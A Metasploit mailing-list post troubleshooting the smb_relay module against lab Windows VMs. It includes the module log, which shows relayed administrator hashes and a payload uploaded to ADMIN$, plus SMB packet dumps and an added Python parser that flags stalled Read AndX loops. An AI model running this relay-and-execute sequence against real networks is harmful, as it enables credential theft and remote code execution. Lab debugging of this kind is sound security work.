Metasploit mailing list archives
Issue with smb_relay
From: nicolas.ruff at gmail.com (Nicolas RUFF)
Date: Thu, 20 Nov 2008 23:49:06 +0100
Hello,

I have an issue with smb_relay module. My configuration is the following:

- Attacker = Ubuntu 8.04 with either framework 3.2-rel or 3.3-svn.
- Victim = either Windows 2000 SP4 or Windows 2003 SP2 "out of the box" virtual machines (French versions of Windows).

I tried all framework/victim combinations, but none worked. Plugin output is:

------------------------------------------------------------------
21:12:46 - Initialized the Metasploit Framework GUI.
21:14:24 - smb_relay [*] Launching exploit windows/smb/smb_relay...
21:14:25 - smb_relay [*] Server started.
21:14:30 - smb_relay [*] Received 192.168.0.129:1033 TEST2K3\Administrator LMHASH:9c69c0a7006c4b69ebdf16cdbd78d62abc1d6dc8cc6ef82b NTHASH:9c69c0a7006c4b69ebdf16cdbd78d62abc1d6dc8cc6ef82b OS:Windows Server 2003 R2 3790 Service Pack 2 LM:
21:14:30 - smb_relay [*] Authenticating to 192.168.0.129 as TEST2K3\Administrator...
21:14:30 - smb_relay [*] AUTHENTICATED as TEST2K3\Administrator...
21:14:30 - smb_relay [*] Connecting to the ADMIN$ share...
21:14:30 - smb_relay [*] Regenerating the payload...
21:14:30 - smb_relay [*] Uploading payload...
21:14:30 - smb_relay [*] Created \KiTOBqaK.exe...
21:14:30 - smb_relay [*] Connecting to the Service Control Manager...
------------------------------------------------------------------

At this point, the binary file has been successfully uploaded on the victim. Then the module goes into an infinite loop while communicating with the SCM. It seems that both keep exchanging SMB packets with 0-sized payload (packets dumped below).

PS. I tried the SOMBI stuff also (mentioned before on this list), but I failed to see how that stuff could be more than a "proof of concept".

Regards,
- Nicolas RUFF

#1 192.168.0.128 -> 192.168.0.129 SMB Read AndX Request, FID: 0x4001, 0 bytes at offset 186
SMB (Server Message Block Protocol)
    SMB Header
        Server Component: SMB
        [Response in: 236]
        SMB Command: Read AndX (0x2e)
        Error Class: Success (0x00)
        Reserved: 00
        Error Code: No Error
        Flags: 0x18
        Flags2: 0x2001
        Process ID High: 0
        Signature: 0000000000000000
        Reserved: 0000
        Tree ID: 2049
        Process ID: 61626
        User ID: 2048
        Multiplex ID: 3431
    Read AndX Request (0x2e)
        Word Count (WCT): 10
        AndXCommand: No further commands (0xff)
        Reserved: 00
        AndXOffset: 0
        FID: 0x4001
        Offset: 186
        Max Count Low: 0
        Min Count: 0
        [File Offset: 186]
        [File RW Length: 0]
        Remaining: 0
        Byte Count (BCC): 0

#2 192.168.0.129 -> 192.168.0.128 SMB Read AndX Response, 0 bytes
SMB (Server Message Block Protocol)
    SMB Header
        Server Component: SMB
        [Response to: 235]
        [Time from request: 0.000436000 seconds]
        SMB Command: Read AndX (0x2e)
        Error Class: Success (0x00)
        Reserved: 00
        Error Code: No Error
        Flags: 0x98
        Flags2: 0x2001
        Process ID High: 0
        Signature: 0000000000000000
        Reserved: 0000
        Tree ID: 2049
        Process ID: 61626
        User ID: 2048
        Multiplex ID: 3431
    Read AndX Response (0x2e)
        Word Count (WCT): 12
        AndXCommand: No further commands (0xff)
        Reserved: 00
        AndXOffset: 0
        [File Offset: 186]
        [File RW Length: 0]
        Remaining: 0
        Data Compaction Mode: 0
        Reserved: 0000
        Data Length Low: 0
        Data Offset: 0
        Data Length High (multiply with 64K): 0
        Reserved: 000000000000
        Byte Count (BCC): 0
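The two frames in the post (a Read AndX request for 0 bytes at offset 186 on FID 0x4001, and its empty response) show the field values of the SMB1 header and of the Read AndX parameter block. The following Python is an added illustration, not part of the original post and not code from the Metasploit module: it rebuilds that request from the values in the dump, parses it back out of the raw bytes so the wire layout behind the dissector output is visible, and flags the stalled pattern described in the post, namely repeated zero-length reads at an unchanging offset on the same FID. The field layout follows MS-CIFS (SMB_COM_READ_ANDX, DOS error format because Flags2 does not set the NT status bit); the frame builder, the sample frame sequence and the threshold of three repeats are constructed assumptions.

```python
import struct
from dataclasses import dataclass
from typing import List, Tuple

SMB_MAGIC = b"\xffSMB"
SMB_COM_READ_ANDX = 0x2E
SMB_FLAGS_REPLY = 0x80          # Flags bit 7: set on responses (0x98 in frame #2)
SMB_FLAGS2_NT_STATUS = 0x4000   # clear in the dump (0x2001), so DOS error format is used


@dataclass
class SmbHeader:
    command: int
    error_class: int
    error_code: int
    flags: int
    flags2: int
    pid_high: int
    signature: bytes
    tid: int
    pid: int
    uid: int
    mid: int

    @property
    def is_response(self) -> bool:
        return bool(self.flags & SMB_FLAGS_REPLY)


@dataclass
class ReadAndXRequest:
    andx_command: int
    andx_offset: int
    fid: int
    offset: int
    max_count: int   # "Max Count Low" in the dissector output
    min_count: int
    timeout: int     # 4 bytes per MS-CIFS; not shown separately by the dissector
    remaining: int
    byte_count: int


def parse_smb_header(data: bytes) -> SmbHeader:
    """Parse the fixed 32-byte SMB1 header (DOS error format, as in the dump)."""
    if len(data) < 32 or data[:4] != SMB_MAGIC:
        raise ValueError("not an SMB1 message")
    (command, err_class, _rsv, err_code, flags, flags2, pid_high,
     signature, _rsv2, tid, pid, uid, mid) = struct.unpack("<BBBHBHH8sHHHHH", data[4:32])
    return SmbHeader(command, err_class, err_code, flags, flags2, pid_high,
                     signature, tid, pid, uid, mid)


def parse_read_andx_request(data: bytes) -> ReadAndXRequest:
    """Parse the Read AndX parameter block (WCT 10 or 12) that follows the header."""
    hdr = parse_smb_header(data)
    if hdr.command != SMB_COM_READ_ANDX or hdr.is_response:
        raise ValueError("not a Read AndX request")
    wct = data[32]
    if wct not in (10, 12):
        raise ValueError(f"unexpected word count {wct}")
    (andx_cmd, _andx_rsv, andx_off, fid, offset, max_count, min_count,
     timeout, remaining) = struct.unpack("<BBHHIHHIH", data[33:53])
    (bcc,) = struct.unpack_from("<H", data, 33 + 2 * wct)  # Byte Count after the words
    return ReadAndXRequest(andx_cmd, andx_off, fid, offset, max_count, min_count,
                           timeout, remaining, bcc)


def build_read_andx_request(tid: int, pid: int, uid: int, mid: int,
                            fid: int, offset: int, max_count: int) -> bytes:
    """Constructed frame builder (assumption): Flags 0x18, Flags2 0x2001, no signing, WCT 10."""
    header = SMB_MAGIC + struct.pack("<BBBHBHH8sHHHHH", SMB_COM_READ_ANDX, 0, 0, 0,
                                     0x18, 0x2001, 0, b"\0" * 8, 0, tid, pid, uid, mid)
    words = struct.pack("<BBBHHIHHIH", 10, 0xFF, 0, 0, fid, offset, max_count, 0, 0, 0)
    return header + words + struct.pack("<H", 0)  # BCC = 0, no data bytes


def find_zero_length_read_loops(requests: List[ReadAndXRequest],
                                threshold: int = 3) -> List[Tuple[int, int, int]]:
    """Return (fid, offset, run_length) for every run of at least `threshold` consecutive
    zero-byte reads at the same offset on the same FID: a client whose file pointer never
    advances, which is the stalled exchange shown in the post."""
    runs: List[Tuple[int, int, int]] = []
    run_key = None
    run_len = 0
    for r in requests:
        key = (r.fid, r.offset)
        if r.max_count == 0 and key == run_key:
            run_len += 1
            continue
        if run_len >= threshold and run_key is not None:
            runs.append((run_key[0], run_key[1], run_len))
        run_key, run_len = (key, 1) if r.max_count == 0 else (None, 0)
    if run_len >= threshold and run_key is not None:
        runs.append((run_key[0], run_key[1], run_len))
    return runs


def sample_requests() -> List[ReadAndXRequest]:
    """Constructed capture: four repeats of frame #1 (MID incrementing), then a real read."""
    frames = [build_read_andx_request(2049, 61626, 2048, 3431 + i, 0x4001, 186, 0)
              for i in range(4)]
    frames.append(build_read_andx_request(2049, 61626, 2048, 3435, 0x4002, 0, 4096))
    frames.append(build_read_andx_request(2049, 61626, 2048, 3436, 0x4002, 4096, 0))
    return [parse_read_andx_request(f) for f in frames]


if __name__ == "__main__":
    first = build_read_andx_request(2049, 61626, 2048, 3431, 0x4001, 186, 0)
    print(parse_smb_header(first))
    print(parse_read_andx_request(first))
    print("stalled read loops:", find_zero_length_read_loops(sample_requests()))
```

The run detector deliberately keys on FID and offset rather than on MID, since the multiplex ID does change between the otherwise identical frames; a healthy client reading a file advances the offset by the returned length on each request, so an offset that stays put across zero-byte reads is the signature to look for in a capture of this exchange.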
Current thread:
- Issue with smb_relay Nicolas RUFF (Nov 20)